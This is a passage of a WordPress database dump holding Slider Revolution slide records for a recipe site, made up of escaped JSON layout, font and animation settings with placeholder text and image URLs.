ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),(42,18,3,'{\"runtime\":{\"collapsedGroups\":[]},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"transition\":[\"fade\"],\"slots\":[0],\"duration\":[1000],\"easeIn\":[\"default\"],\"easeOut\":[\"default\"],\"rotation\":[0]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"6\":{\"text\":\"\",\"alias\":\"Image-6\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2020\\/04\\/long-advert-NW-recipes.jpg\",\"imageId\":5247,\"loaded\":true,\"imageLib\":\"medialibrary\"},\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1500px\",\"e\":true},\"n\":{\"v\":\"1238px\"},\"t\":{\"v\":\"940px\"},\"m\":{\"v\":\"579px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"412px\"},\"t\":{\"v\":\"313px\"},\"m\":{\"v\":\"193px\"}},\"originalWidth\":1200,\"originalHeight\":400,\"aspectRatio\":{\"d\":{\"v\":3},\"n\":{\"v\":3},\"t\":{\"v\":3},\"m\":{\"v\":3}},\"scaleProportional\":true,\"originalSize\":false},\"position\":{\"x\":{\"d\":{\"v\":\"-1px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-50px\",\"e\":true},\"n\":{\"v\":\"-41px\"},\"t\":{\"v\":\"-31px\"},\"m\":{\"v\":\"-19px\"}},\"zIndex\":5,\"position\":\"absolute\"},\"group\":{\"groupOrder\":5},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":9000,\"endWithSlide\":true,\"frameLength\":300}}},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"16\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"20\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[]},\"type\":\"image\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":0},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":0,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'); /*!40000 ALTER TABLE `wpvt_revslider_slides` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_slides_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_slides_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_slides_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `slider_id` int(9) NOT NULL, `slide_order` int(11) NOT NULL, `params` longtext NOT NULL, `layers` longtext NOT NULL, `settings` text NOT NULL DEFAULT '', UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=43 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_slides_bkp` -- LOCK TABLES `wpvt_revslider_slides_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_slides_bkp` DISABLE KEYS */; INSERT INTO `wpvt_revslider_slides_bkp` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES (1,1,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#f7f7f7\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-cimet-img-71.png\",\"imageId\":4589},\"size\":{\"width\":{\"d\":{\"v\":\"186px\",\"e\":true},\"n\":{\"v\":\"148px\",\"e\":true},\"t\":{\"v\":\"202px\",\"e\":true},\"m\":{\"v\":\"94px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"394px\",\"e\":true},\"n\":{\"v\":\"313px\",\"e\":true},\"t\":{\"v\":\"428px\",\"e\":true},\"m\":{\"v\":\"198px\",\"e\":true}},\"originalWidth\":186,\"originalHeight\":394,\"aspectRatio\":{\"d\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"n\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"t\":{\"v\":0.472081218274111702459805428588879294693470001220703125},\"m\":{\"v\":0.472081218274111702459805428588879294693470001220703125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-873px\",\"e\":true},\"n\":{\"v\":\"-50px\",\"e\":true},\"t\":{\"v\":\"-16px\",\"e\":true},\"m\":{\"v\":\"-25px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"190px\",\"e\":true},\"t\":{\"v\":\"255px\",\"e\":true},\"m\":{\"v\":\"235px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"2\":{\"text\":\"FOR WORDPRESS\",\"alias\":\"FOR WORDPRESS\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"e\":true}},\"height\":{\"d\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-641px\",\"e\":true},\"n\":{\"v\":\"-520px\",\"e\":true},\"t\":{\"v\":\"66px\",\"e\":true},\"m\":{\"v\":\"40px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-387px\",\"e\":true},\"n\":{\"v\":\"-343px\",\"e\":true},\"t\":{\"v\":\"54px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\"},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"14px\",\"e\":true},\"n\":{\"v\":\"14px\"},\"t\":{\"v\":\"14px\"},\"m\":{\"v\":\"14px\"}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"3px\",\"e\":true},\"n\":{\"v\":\"3px\"},\"t\":{\"v\":\"3px\"},\"m\":{\"v\":\"3px\"}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#3c3c3c\",\"e\":true},\"n\":{\"v\":\"#3c3c3c\"},\"t\":{\"v\":\"#3c3c3c\"},\"m\":{\"v\":\"#3c3c3c\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"Top Recipes \",\"alias\":\"Top Recipes \",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-539px\",\"e\":true},\"n\":{\"v\":\"-420px\",\"e\":true},\"t\":{\"v\":\"64px\",\"e\":true},\"m\":{\"v\":\"38px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-331px\",\"e\":true},\"n\":{\"v\":\"-294px\",\"e\":true},\"t\":{\"v\":\"104px\",\"e\":true},\"m\":{\"v\":\"104px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\"},\"t\":{\"v\":\"#444444\"},\"m\":{\"v\":\"#444444\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\"},\"t\":{\"v\":\"60px\"},\"m\":{\"v\":\"40px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\"},\"t\":{\"v\":\"700\"},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"1px\",\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#444444\",\"e\":true},\"n\":{\"v\":\"#444444\"},\"t\":{\"v\":\"#444444\"},\"m\":{\"v\":\"#444444\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"4\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its .\",\"alias\":\"It is a long establi...\",\"uid\":4,\"size\":{\"width\":{\"d\":{\"v\":\"418px\",\"e\":true},\"n\":{\"v\":\"418px\",\"e\":true},\"t\":{\"v\":\"418px\"},\"m\":{\"v\":\"243px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"67px\",\"e\":true},\"n\":{\"v\":\"67px\",\"e\":true},\"t\":{\"v\":\"67px\"},\"m\":{\"e\":true}},\"originalWidth\":\"418px\",\"originalHeight\":\"67px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-510px\",\"e\":true},\"n\":{\"v\":\"124px\",\"e\":true},\"t\":{\"v\":\"64px\",\"e\":true},\"m\":{\"v\":\"39px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-253px\",\"e\":true},\"n\":{\"v\":\"240px\",\"e\":true},\"t\":{\"v\":\"160px\",\"e\":true},\"m\":{\"v\":\"160px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 